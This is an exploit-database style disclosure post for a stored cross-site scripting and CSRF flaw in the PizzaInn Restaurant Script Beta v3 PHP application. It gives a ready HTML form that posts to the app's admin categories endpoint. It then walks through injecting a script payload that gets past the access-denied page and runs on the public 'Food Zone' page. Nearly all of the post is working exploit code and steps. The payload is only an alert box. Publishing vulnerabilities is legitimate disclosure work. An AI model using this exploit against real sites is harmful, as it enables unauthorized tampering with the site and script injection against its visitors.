Home / os / winmobile

PizzaInn Beta 3 Cross Site Scripting

Posted on 20 October 2016

# Exploit Title :----------------- : PizzaInn Restaurant Scripti (Beta v3) - (categories-exec.php) - Stored XSS # Author :------------------------ : Nassim Asrir # Author Company :------------------------ : HenceForth # Author Email :------------------------ : wassline@gmail.com # Google Dork :---------------- : - # Date :-------------------------- : 20/10/2016 # Type :-------------------------- : webapps # Platform : -------------------- : PHP # Software link : -------------- : http://wmscripti.com/php-scriptler/pizzainn-restaurant-scripti-beta-v3.html ############################ Stored XSS Vulnerabilty ############################ ## Exploit ## <html> <title>CSRF Exploit By Nassim Asrir</title> <CAPTION><h3>ADD A NEW CATEGORY</h3></CAPTION> <form name="categoryForm" id="categoryForm" action="http://Site/script/admin/categories-exec.php" method="post" onsubmit="return categoriesValidate(this)"> <tr> <th>Name</th> </tr> <tr> <td><input type="text" name="name" class="textfield" /></td> <td><input type="submit" name="Submit" value="Add" /></td> </tr> </form> </table> </html> ## Proc ## - Create a .html File and Put the Code. - Navigate the File in your Localhost . - and in the Textbox inject XSS Payload ("><script>alert(1);</script>) and you redirect to http://site/script/admin/access-denied.php - and You get the Message "Access Denied! You do not have access to this resource." but don't worry. when you get the Message go to home site and navigate "Food Zone" . and you can see the Alert Box.

 

TOP